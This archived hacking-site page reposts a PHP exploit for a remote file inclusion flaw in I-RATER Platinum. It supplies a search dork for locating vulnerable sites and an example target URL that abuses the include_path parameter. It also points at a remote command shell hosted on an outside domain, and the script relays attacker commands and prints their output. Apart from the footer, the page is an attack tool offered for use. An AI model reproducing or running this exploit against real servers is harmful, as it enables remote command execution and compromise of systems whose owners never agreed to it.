AOH :: HP Unsorted I :: B06-1952.HTM

I-rater platinum remote file inclusion exploit cod3d by r@1d3n



I-RATER Platinum Remote File Inclusion exploit Cod3d by R@1D3N
I-RATER Platinum Remote File Inclusion exploit Cod3d by R@1D3N



Site:http://www.Aria-security.net=0D 
Dork:"Powered by I-RATER PLATINUM"=0D
=0D
example:=0D
target:http://www.site.com/admin/config_settings.tpl.php?include_path==0D 
cmdshell:http://www.own3r.com/cmd.txt?=0D 
=0D
*/=0D
=0D
$cmd = $_POST["cmd"];=0D
$target = $_POST["target"];=0D
$cmdshell = $_POST["cmdshell"];=0D
=0D
$form= "
"=0D ."target:

"=0D ."cmdshell:

"=0D ."cmd:

"=0D .""=0D =0D ."

";=0D =0D if (!isset($_POST['submit']))=0D {=0D =0D echo $form;=0D =0D }else{=0D =0D $file = fopen ("test.txt", "w+");=0D =0D fwrite($file, "");=0D fclose($file);=0D =0D $file = fopen ($target.$cmdshell, "r");=0D if (!$file) {=0D echo "

Unable to get output.\n";=0D exit;=0D }=0D =0D echo $form;=0D =0D while (!feof ($file)) {=0D $line .= fgets ($file, 1024)."
";=0D }=0D $tpos1 = strpos($line, "++BEGIN++");=0D $tpos2 = strpos($line, "++END++");=0D $tpos1 = $tpos1+strlen("++BEGIN++");=0D $tpos2 = $tpos2-$tpos1;=0D $output = substr($line, $tpos1, $tpos2);=0D echo $output;=0D =0D }=0D ?>=0D

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.